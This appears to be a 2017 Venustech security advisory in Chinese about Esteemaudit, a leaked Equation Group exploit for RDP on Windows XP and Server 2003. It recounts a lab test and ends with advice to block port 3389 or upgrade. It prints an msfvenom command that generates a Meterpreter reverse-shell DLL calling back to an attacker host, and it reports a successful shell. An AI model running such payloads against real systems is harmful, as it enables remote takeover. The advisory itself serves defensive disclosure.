【安全预警】警惕方程式组织另一攻击工具,补完445莫忘关3389
发布时间:2017-05-16   作者:启明星辰

近日,勒索蠕虫病毒“Wanacry”席卷全球,究其根本是因为其利用了一款名为“永恒之蓝“的工具,而这款工具正是4月份影子经纪人泄露的疑似方程式组织的网络武器库中的一款。上周末启明星辰Adlab首发针对方程式组织武器库的深度分析报告——《“Wanacry”事件分析与启示:警惕下一个“永恒之蓝”》(详情请点击阅读原文)

 

传送门:http://mp.weixin.qq.com/s/G86-W6n_nWDiZpJ1IcgLAA

 

影子经纪人这次被披露的方程式组织资料里可造成严重影响的漏洞利用工具还有很多,本文将深度分析其中的Esteemaudit。Esteemaudit是一个通过3389端口远程溢出程序。3389端口是远程桌面的服务端口,它使用RDP协议进行通信。Esteemaudit正是利用RDP协议的漏洞来进行攻击。

 

Esteemaudit工具的攻击对象有Windows XP sp0-sp3和Windows Server 2003 sp0-sp2。

 

 

为了验证Esteemaudit是否真的能够对Windows系统发起攻击,我们在攻防实验室里搭建了一套实验环境以Windows2003为例来验证。

 

Esteemaudit攻击能力验证实验

 

●验证环境如下:

 

 

●验证过程:

 

Exploit模式:

kali:运行“msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.69.143 LPORT=4444 -f dll > RDP.dll",生成RDP.dll。然后在本地监听4444端口。

 

 

Win10:运行use Pcdlllauncher ,参数如下所示,其中RDP.dll由kali生成。

 

 

攻击成功,反弹shell到kali机器上。

 

 

 

防御建议

 

由于微软已经停止了对Windows XP和Windows2003系统的更新,而上周发布的特别补丁也仅仅针对“永恒之蓝“,所以目前没有补丁能够对Esteemaudit涉及的漏洞进行修复,我们只能通过系统防火墙屏蔽3389端口或者升级到Windows 7以上的操作系统来防御Esteemaudit的攻击!

 

安全源于未雨绸缪,在下一个“Wanacry “到来之前,请做好防御Esteemaudit攻击的准备!


我们将对影子经纪人泄露的方程式组织资料持续跟进研究,敬请期待…

 

文章来源:http://www.venustech.com.cn/
  • 公司总部 | 分支机构 | 法律声明 | 投资者关系 | 400-624-3900 800-810-6038
  • © 启明星辰1996-2015 版权所有 京ICP备05032414号 京公网安备110108003435号